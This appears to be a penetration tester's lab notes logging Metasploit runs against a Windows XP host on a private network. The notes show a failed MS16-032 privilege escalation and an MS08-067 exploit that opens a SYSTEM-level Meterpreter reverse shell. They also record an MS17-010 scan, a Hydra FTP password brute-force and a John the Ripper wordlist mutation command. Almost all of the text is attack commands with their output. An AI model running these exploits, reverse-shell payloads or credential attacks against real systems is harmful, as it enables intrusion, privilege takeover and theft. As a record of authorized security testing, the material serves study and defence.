-----------------------------------------------------------------------------
Test of "/exploit/windows/local/ms16_032_secondary_logon_handle_privesc"

msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] Writing payload file, c:\inetpub\wwwroot\pHQXTtfjlMKqA.txt...
[*] Compressing script contents...
[+] Compressed size: 3613
[*] Executing exploit script...
[+] Cleaned up c:\inetpub\wwwroot\pHQXTtfjlMKqA.txt
[*] Exploit completed, but no session was created.



runas /noprofile /user:BOBBY\JFC cmd

===============
Other tests
===============

After disabling the Firewall, I retested the 'ms08_067_netapi' exploit and it worked perfectly like old times :-)
--------------------------------------------------------------------------------------------------------------------

msf exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.11     yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.8      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] 192.168.1.11:445 - Automatically detecting the target...
[*] 192.168.1.11:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] 192.168.1.11:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.11:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.11:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 192.168.1.11
[*] Meterpreter session 13 opened (192.168.1.8:4444 -> 192.168.1.11:1028) at 2020-03-10 23:26:43 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege




msf auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.1.8                                                     yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.11
RHOSTS => 192.168.1.11
msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.11:445      - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.11:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


root@Security-Audit-01:~# hydra -l jfc -p jfc ftp://192.168.1.11:21
Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-09 02:11:41
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ftp://192.168.1.11:21/
[21][ftp] host: 192.168.1.11   login: jfc   password: jfc
1 of 1 target successfully completed, 1 valid password found


Puis on génère une seconde wordlist basée sur celle-ci en appliquant des mutations via John The Ripper :
/opt/jtr/john --rules --wordlist=dico.txt --stdout > candidates.txt


